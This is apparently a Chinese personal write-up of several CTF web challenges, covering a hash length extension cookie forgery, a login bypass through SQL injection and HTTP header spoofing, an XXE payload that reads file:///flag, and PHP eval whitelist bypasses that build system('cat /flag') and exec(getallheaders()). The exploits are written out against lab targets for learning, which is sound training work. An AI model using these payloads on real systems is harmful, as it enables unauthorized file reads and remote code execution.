[De1CTF 2019]SSRF Me

https://xz.aliyun.com/t/6050
https://www.jianshu.com/p/eb60c856f2a3
看了看两位师傅的文章!感觉这到题好wl!!!!!
Md5扩展长度攻击那点没看太懂!密码写的一塌糊涂!!!
大概流程就是python审计+Md5扩展长度攻击

这个题就不回味了!我真吃不透!!

payload:

/geneSign?param=flag.txt
GET /De1ta?param=flag.txt 
Cookie: action=readscan;    sign=574d25eb12ce17aea8e501b9445e1696

[BJDCTF 2nd]假猪套天下第一

image-20210101153301907

页面好熟悉呀!!
不能因为页面熟悉就认为是一类题!!

看看能不能万能密码:

Hello, admin'/**/or/**/1=1/**/#

image-20210101153837624

好家伙:

直接跳到大大大大大大大大大大大佬博客了!

Y1ngyyds

image-20210101154058666

回来看了看好像不对
好像啥都能登录!!

image-20210101155240217

bp抓包看下返回!!抓包查看信息,发现源代码有提示
</body>
<!-- L0g1n.php --></html>

这这我想不到呀!!

image-20210101160810020

https://blog.csdn.net/qq_45521281/article/details/105775452
看了看大佬的文章!!又学到了点HTTP的内容!!!😄

http header头

Header 解释 示例
Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json
Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5
Accept-Encoding 指定浏览器可以支持的web服务器返回内容压缩编码类型。 Accept-Encoding: compress, gzip
Accept-Language 浏览器可接受的语言 Accept-Language: en,zh
Accept-Ranges 可以请求网页实体的一个或者多个子范围字段 Accept-Ranges: bytes
Authorization HTTP授权的授权证书 Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
Cache-Control 指定请求和响应遵循的缓存机制 Cache-Control: no-cache
Connection 表示是否需要持久连接。(HTTP 1.1默认进行持久连接) Connection: close
Cookie HTTP请求发送时,会把保存在该请求域名下的所有cookie值一起发送给web服务器。 Cookie: $Version=1; Skin=new;
Content-Length 请求的内容长度 Content-Length: 348
Content-Type 请求的与实体对应的MIME信息 Content-Type: application/x-www-form-urlencoded
Date 请求发送的日期和时间 Date: Tue, 15 Nov 2010 08:12:31 GMT
Expect 请求的特定的服务器行为 Expect: 100-continue
From 发出请求的用户的Email From: user@email.com
Host 指定请求的服务器的域名和端口号 Host: www.zcmhi.com
If-Match 只有请求内容与实体相匹配才有效 If-Match: “737060cd8c284d8af7ad3082f209582d”
If-Modified-Since 如果请求的部分在指定时间之后被修改则请求成功,未被修改则返回304代码 If-Modified-Since: Sat, 29 Oct 2010 19:43:31 GMT
If-None-Match 如果内容未改变返回304代码,参数为服务器先前发送的Etag,与服务器回应的Etag比较判断是否改变 If-None-Match: “737060cd8c284d8af7ad3082f209582d”
If-Range 如果实体未改变,服务器发送客户端丢失的部分,否则发送整个实体。参数也为Etag If-Range: “737060cd8c284d8af7ad3082f209582d”
If-Unmodified-Since 只在实体在指定时间之后未被修改才请求成功 If-Unmodified-Since: Sat, 29 Oct 2010 19:43:31 GMT
Max-Forwards 限制信息通过代理和网关传送的时间 Max-Forwards: 10
Pragma 用来包含实现特定的指令 Pragma: no-cache
Proxy-Authorization 连接到代理的授权证书 Proxy-Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
Range 只请求实体的一部分,指定范围 Range: bytes=500-999
Referer 先前网页的地址,当前请求网页紧随其后,即来路 Referer: http://www.zcmhi.com/archives…
TE 客户端愿意接受的传输编码,并通知服务器接受接受尾加头信息 TE: trailers,deflate;q=0.5
Upgrade 向服务器指定某种传输协议以便服务器进行转换(如果支持) Upgrade: HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11
User-Agent User-Agent的内容包含发出请求的用户信息 User-Agent: Mozilla/5.0 (Linux; X11)
Via 通知中间网关或代理服务器地址,通信协议 Via: 1.0 fred, 1.1 nowhere.com (Apache/1.1)
Warning 关于消息实体的警告信息 Warn: 199 Miscellaneous warning 
python2 ds_store_exp.py http://node3.buuoj.cn:28699/.DS_Store

DS_Store泄露
大概总结一下啊:
xff 使用XFF或者Client-ip绕过: 本地登录
添加Referer头:来源
添加User-agent头:浏览器
添加From头:邮箱
proxy 代理:Via

[NCTF2019]Fake XML cookbook

image-20210101171433773

熟悉的页面!!!
考察点很明显!xxe
有篇教程!
https://xz.aliyun.com/t/6887
XML注入和XPath注入。于是把XML注入、XPath注入和XML 外部实体注入
什么是 XML?
XML 指可扩展标记语言(EXtensible Markup Language)。
XML 的设计宗旨是传输数据,而不是显示数据。
XML 是 W3C 的推荐标准。
XML 不会做任何事情。XML 被设计用来结构化、存储以及传输信息。
XML 语言没有预定义的标签。

我以前的理解就是:前后端的语言不同,数据格式不一样!但是传输的过程为了前后端传输的数据都能识别,就写了xml来存储,传输数据!
XML 不会做任何事情。XML 被设计用来结构化、存储以及传输信息。

直接payload:

<!DOCTYPE ANY [
    <!ENTITY test SYSTEM "file:///flag">
]>
<user><username>&test;</username><password>123</password></user>

爬虫的包研究半天,一开始老是运行不了!

Python3安装与使用urllib2包之小坑

[ASIS 2019]Unicorn shop

image-20210101190955334

看了看了好像是什么Unicode安全问题!不是很懂!!

但是这个题的意思就是要通过utf-8 表示一个大于1337.0的字符!

image-20210101193854161

在把他们转成%的16进制传入!

0xF0 0x90 0x85 0x96
%F0%90%85%96

Unicode

浅谈Unicode设计的安全性

Unicode等价性浅谈

UNICODE SECURITY CONSIDERATIONS

推荐一个搜Unicode的好地方

[CISCN 2019 初赛]Love Math

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}
代码执行!!
让我想起来以前做的一道题了!;
全国工业互联网安全技术技能大赛部分wp
web题 SimpleCalculator

payload1:

$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag

当时的理解:

$pi=(is_nan^(6).(4)).(tan^(1).(5));

他就是个_GET
然后$pi=$$pi;
变成$_GET
$pi{0}($pi{1})
相当于
$_GET[]/{0}   这里相当于设置了2个get传参!
&0=system&1=cat%20/flag      %20是空格
system(cat%20/flag)
就是通过白名单里的数学函数!来构造shell或者直接命令执行!!
今天看看原理!!

image-20210101213036821

注意他这里是eval('echo '.$content.';');	
是可以拼接的代码执行的!!

payload2:

还看到一种payload:
$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=tac /flag

base_convert— 在 任意进制之间转换数字
如下:从二进制转成十进制!
base_convert(37907361743,10,36)

image-20210101212143369

image-20210101212544192

dechex — 十进制转换为十六进制
echo dechex(1598506324);5f474554
转换成hex2bin(5f474554) 是 _GET

image-20210101212748388

GET请求中参数分隔符分号(;)和and符(&)分隔参数的区别

base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})

($$pi){pi}(($$pi){abs})


$_GET{pi}(($_GET){abs})

五日看到了!大佬的 tac flag 

$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=tac /flag

image-20210103202043620

image-20210103203223752

上面3种情况都可以运行!

payload3:

看到大佬的写发,又学到了!:

getallheaders — 获取全部 HTTP 请求头信息

$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

直接搬运大佬的:
base_convert(696468,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
exec(getallheaders(){1})
//操作xx和yy,中间用逗号隔开,echo都能输出
echo xx,yy

刚开始以为exec没有回显不能返回前端页面数据!!

image-20210103204621674

base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))